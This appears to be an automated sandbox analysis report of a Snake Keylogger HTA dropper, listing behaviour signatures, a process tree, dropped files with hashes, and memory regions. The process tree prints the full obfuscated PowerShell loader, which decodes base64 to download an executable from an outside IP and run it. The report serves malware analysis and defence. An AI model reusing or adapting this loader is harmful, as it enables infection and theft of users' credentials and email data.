Analysis

  • max time kernel
    113s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-10-2024 02:08

General

  • Target

    f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta

  • Size

    116KB

  • MD5

    bac652fa9a932e3f71411fb993010377

  • SHA1

    0dbe1f2b08510b57f0e00189d2355f57e300c47f

  • SHA256

    f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916

  • SHA512

    0ab2913b55e1f60cdb26f003d2c17b492385a43bca2d2c5acb1a659c9a5ed3d232eeceb8b0d4b68ffad11599dab9c27d16d1c990f23e54ea3a8ccd73a4de536f

  • SSDEEP

    96:Ea+M73mAWZeuhtAWZDuhogROBHRj/oyYJQAWZSAWZXuhdAWZkAT:Ea+Q3mVkuhtVVuhhRwHxY+VgVFuhdVZT

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3980
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kubc0k4z\kubc0k4z.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3192
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE08C.tmp" "c:\Users\Admin\AppData\Local\Temp\kubc0k4z\CSC7D2453DC9951441283B934CDB64F7E5.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:644
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESE08C.tmp

    Filesize

    1KB

    MD5

    65db176d081d732ff5add2e599be88ab

    SHA1

    7abeb24969a428d6a25a8c53a0ded036ef8ea2b7

    SHA256

    9f3db0ffa99ca78fbb4781c626b9884417806553919552e81f43bd057bae59c8

    SHA512

    6f14f67a44eebee115a2a29b204367d3ac31a3ead7387a2281b6949ab06a21d3fcd140d7965e579e83cfc73972e8e495f3712020883f4c1554cd23392be8587f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3akghsu.mxj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\kubc0k4z\kubc0k4z.dll

    Filesize

    3KB

    MD5

    1790e862fd2ecbb723f3138164fbe937

    SHA1

    61867409685aa9ecf63a0915e35650cf0ff34038

    SHA256

    ce44703ca341c01a0d2735b414e7a8f6a8f0a818e39ed947bb13e529a815fb03

    SHA512

    b9e8797508b8b26d4e26c44825d3c0c8898c997828142e9ba3f338fa7a1b22a57392072caa4f031fc34983ecc9a8191c12c8173eceee3d2aed291b7224da5d40

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    934KB

    MD5

    d515411b9a3c0d9fb13b9c6a928a7fd0

    SHA1

    f940a7302ac76567c15efb1a15d789b42224aac3

    SHA256

    7b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77

    SHA512

    447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6

  • \??\c:\Users\Admin\AppData\Local\Temp\kubc0k4z\CSC7D2453DC9951441283B934CDB64F7E5.TMP

    Filesize

    652B

    MD5

    07c765c26523d52617c595e367ead82f

    SHA1

    9addf0c1935eb27a7d85b08d5b3477431df5651d

    SHA256

    de5fa6a48164e7f5e84fe0ce2105d98290986a27abca2c8742313ea583a02bba

    SHA512

    d95258f6ac45765c6348025633fcbe5f0010fb5a6bd8282772dc58df41297ec06011977a66ad36f4cdbf37a23d4aefd52a1dec2ce66009efe3b7085fee0cf0e5

  • \??\c:\Users\Admin\AppData\Local\Temp\kubc0k4z\kubc0k4z.0.cs

    Filesize

    489B

    MD5

    66cd8bc31e61e003cddb2ea81c47016a

    SHA1

    b9172635caecd693d1476d08c9cecb5777ea49bb

    SHA256

    0ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd

    SHA512

    6dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4

  • \??\c:\Users\Admin\AppData\Local\Temp\kubc0k4z\kubc0k4z.cmdline

    Filesize

    369B

    MD5

    2a87feeb9f1390a0d10ca14c6c9e06a1

    SHA1

    d420c3091e98834a3bc57be6e313e5695415ec3a

    SHA256

    5eba3a7275d9f4be40dcff66a8e1410807fdb0b842146e07e5df5a0e5f5a0ed2

    SHA512

    4e297ef0576ff56f2139a58306fc6282e76c7b841b6b9dd311f92683bd430194ccf89cda9359f5210ae0cdc90aec6868f0573ce40354e0a14d922461f9f24274

  • memory/1336-41-0x00000000071D0000-0x00000000071E1000-memory.dmp

    Filesize

    68KB

  • memory/1336-45-0x0000000007240000-0x0000000007248000-memory.dmp

    Filesize

    32KB

  • memory/1336-17-0x00000000056B0000-0x0000000005A04000-memory.dmp

    Filesize

    3.3MB

  • memory/1336-18-0x0000000005C80000-0x0000000005C9E000-memory.dmp

    Filesize

    120KB

  • memory/1336-19-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

    Filesize

    304KB

  • memory/1336-20-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-21-0x0000000006C50000-0x0000000006C82000-memory.dmp

    Filesize

    200KB

  • memory/1336-22-0x000000006DEF0000-0x000000006DF3C000-memory.dmp

    Filesize

    304KB

  • memory/1336-23-0x000000006E260000-0x000000006E5B4000-memory.dmp

    Filesize

    3.3MB

  • memory/1336-33-0x0000000006240000-0x000000000625E000-memory.dmp

    Filesize

    120KB

  • memory/1336-34-0x0000000006F30000-0x0000000006FD3000-memory.dmp

    Filesize

    652KB

  • memory/1336-35-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-36-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-37-0x0000000007660000-0x0000000007CDA000-memory.dmp

    Filesize

    6.5MB

  • memory/1336-38-0x0000000006FE0000-0x0000000006FFA000-memory.dmp

    Filesize

    104KB

  • memory/1336-39-0x0000000007050000-0x000000000705A000-memory.dmp

    Filesize

    40KB

  • memory/1336-40-0x0000000007270000-0x0000000007306000-memory.dmp

    Filesize

    600KB

  • memory/1336-0-0x000000007163E000-0x000000007163F000-memory.dmp

    Filesize

    4KB

  • memory/1336-42-0x0000000007200000-0x000000000720E000-memory.dmp

    Filesize

    56KB

  • memory/1336-43-0x0000000007210000-0x0000000007224000-memory.dmp

    Filesize

    80KB

  • memory/1336-44-0x0000000007250000-0x000000000726A000-memory.dmp

    Filesize

    104KB

  • memory/1336-12-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-5-0x0000000004DE0000-0x0000000004E46000-memory.dmp

    Filesize

    408KB

  • memory/1336-6-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

  • memory/1336-4-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

    Filesize

    136KB

  • memory/1336-3-0x0000000004E60000-0x0000000005488000-memory.dmp

    Filesize

    6.2MB

  • memory/1336-2-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-58-0x0000000007240000-0x0000000007248000-memory.dmp

    Filesize

    32KB

  • memory/1336-64-0x000000007163E000-0x000000007163F000-memory.dmp

    Filesize

    4KB

  • memory/1336-65-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-66-0x00000000074D0000-0x00000000074F2000-memory.dmp

    Filesize

    136KB

  • memory/1336-67-0x0000000008290000-0x0000000008834000-memory.dmp

    Filesize

    5.6MB

  • memory/1336-68-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/1336-1-0x0000000000ED0000-0x0000000000F06000-memory.dmp

    Filesize

    216KB

  • memory/1336-81-0x0000000071630000-0x0000000071DE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2740-84-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2740-85-0x0000000004DB0000-0x0000000004E4C000-memory.dmp

    Filesize

    624KB

  • memory/2740-86-0x0000000005FB0000-0x0000000006000000-memory.dmp

    Filesize

    320KB

  • memory/2740-87-0x00000000061D0000-0x0000000006392000-memory.dmp

    Filesize

    1.8MB

  • memory/2740-88-0x00000000060A0000-0x0000000006132000-memory.dmp

    Filesize

    584KB

  • memory/2740-89-0x0000000006050000-0x000000000605A000-memory.dmp

    Filesize

    40KB